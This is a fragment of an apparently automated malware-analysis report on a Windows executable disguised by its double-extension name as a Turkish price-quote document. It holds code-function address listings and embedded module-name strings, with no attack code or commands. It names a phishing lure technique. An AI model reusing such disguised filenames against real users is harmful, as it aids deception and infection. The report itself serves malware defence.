                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B7C1304_2_07B7C130
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B759584_2_07B75958
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 4_2_07B750E84_2_07B750E8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1D27811_2_02A1D278
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1536211_2_02A15362
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1A08811_2_02A1A088
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1C14611_2_02A1C146
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1C73811_2_02A1C738
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1C46B11_2_02A1C46B
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1CA0811_2_02A1CA08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A169A011_2_02A169A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1E98811_2_02A1E988
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A13E0911_2_02A13E09
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1CFAB11_2_02A1CFAB
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A16FC811_2_02A16FC8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1CCD811_2_02A1CCD8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A129E011_2_02A129E0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1F97911_2_02A1F979
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_02A1E97B11_2_02A1E97B
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B954811_2_051B9548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B296811_2_051B2968
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B502811_2_051B5028
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B9C7011_2_051B9C70
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BFC6811_2_051BFC68
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B0B3011_2_051B0B30
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B17A011_2_051B17A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BDE0011_2_051BDE00
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B1E8011_2_051B1E80
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B295B11_2_051B295B
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BD55011_2_051BD550
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BD54011_2_051BD540
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BD99911_2_051BD999
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BD9A811_2_051BD9A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BDDFF11_2_051BDDFF
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B501811_2_051B5018
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BF81011_2_051BF810
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BF80211_2_051BF802
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B000611_2_051B0006
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B004011_2_051B0040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BCC8F11_2_051BCC8F
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BCCA011_2_051BCCA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BD0F811_2_051BD0F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BEB0811_2_051BEB08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B932811_2_051B9328
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B0B2011_2_051B0B20
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BEF5111_2_051BEF51
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BEF6011_2_051BEF60
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B8B9111_2_051B8B91
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B178F11_2_051B178F
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BF3B811_2_051BF3B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BF3A811_2_051BF3A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B8BA011_2_051B8BA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B9BF611_2_051B9BF6
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BE25811_2_051BE258
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BE24A11_2_051BE24A
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B1E7011_2_051B1E70
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BE6B011_2_051BE6B0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BE6AF11_2_051BE6AF
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051BEAF811_2_051BEAF8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057781D011_2_057781D0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05777B7811_2_05777B78
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577B31811_2_0577B318
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05778FB011_2_05778FB0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577C55811_2_0577C558
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577C54811_2_0577C548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577E54811_2_0577E548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05770D4811_2_05770D48
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05770D3911_2_05770D39
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577A93811_2_0577A938
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577E53811_2_0577E538
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577A92811_2_0577A928
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057715F811_2_057715F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057715E811_2_057715E8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577C9E811_2_0577C9E8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577C9D811_2_0577C9D8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577E9D811_2_0577E9D8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057781C411_2_057781C4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577E9C811_2_0577E9C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057711A011_2_057711A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577119011_2_05771190
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577647811_2_05776478
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577346011_2_05773460
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577345011_2_05773450
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577004011_2_05770040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577603011_2_05776030
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577BC3811_2_0577BC38
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577602211_2_05776022
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577BC2B11_2_0577BC2B
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577DC2811_2_0577DC28
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577DC1911_2_0577DC19
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577FC1811_2_0577FC18
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577000711_2_05770007
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577300811_2_05773008
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057708F011_2_057708F0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057708E011_2_057708E0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577C0C811_2_0577C0C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577C0B711_2_0577C0B7
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577E0B811_2_0577E0B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057738B811_2_057738B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577E0A711_2_0577E0A7
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577049811_2_05770498
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577048911_2_05770489
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577648811_2_05776488
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577577011_2_05775770
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577F77811_2_0577F778
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05777B6911_2_05777B69
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577275811_2_05772758
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577274911_2_05772749
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577772011_2_05777720
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577532811_2_05775328
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577771011_2_05777710
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577531A11_2_0577531A
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577B30711_2_0577B307
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577230011_2_05772300
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577D30811_2_0577D308
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05772FF911_2_05772FF9
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05775BD811_2_05775BD8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05772BB011_2_05772BB0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05778FA111_2_05778FA1
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05772BA011_2_05772BA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577B7A811_2_0577B7A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577B79811_2_0577B798
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577D79811_2_0577D798
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577D78711_2_0577D787
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577578011_2_05775780
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577F78811_2_0577F788
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05776E7011_2_05776E70
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577CE7811_2_0577CE78
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05774A7811_2_05774A78
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577CE6711_2_0577CE67
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05776E6211_2_05776E62
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05774A6811_2_05774A68
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577EE6811_2_0577EE68
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577EE5711_2_0577EE57
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05771A5011_2_05771A50
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05771A4111_2_05771A41
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577462011_2_05774620
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577461011_2_05774610
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05776A1811_2_05776A18
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577D2F711_2_0577D2F7
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057722F011_2_057722F0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577F2F811_2_0577F2F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_0577F2E711_2_0577F2E7
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05774ED011_2_05774ED0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05774EC211_2_05774EC2
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057772C811_2_057772C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_057772B811_2_057772B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05771EA811_2_05771EA8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_05771E9811_2_05771E98
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000000.1271195336.0000000000ECA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelwhS.exe< vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1309645591.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.00000000043B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1313317868.0000000005BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1310525073.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1314741541.0000000007AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1310525073.0000000003402000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
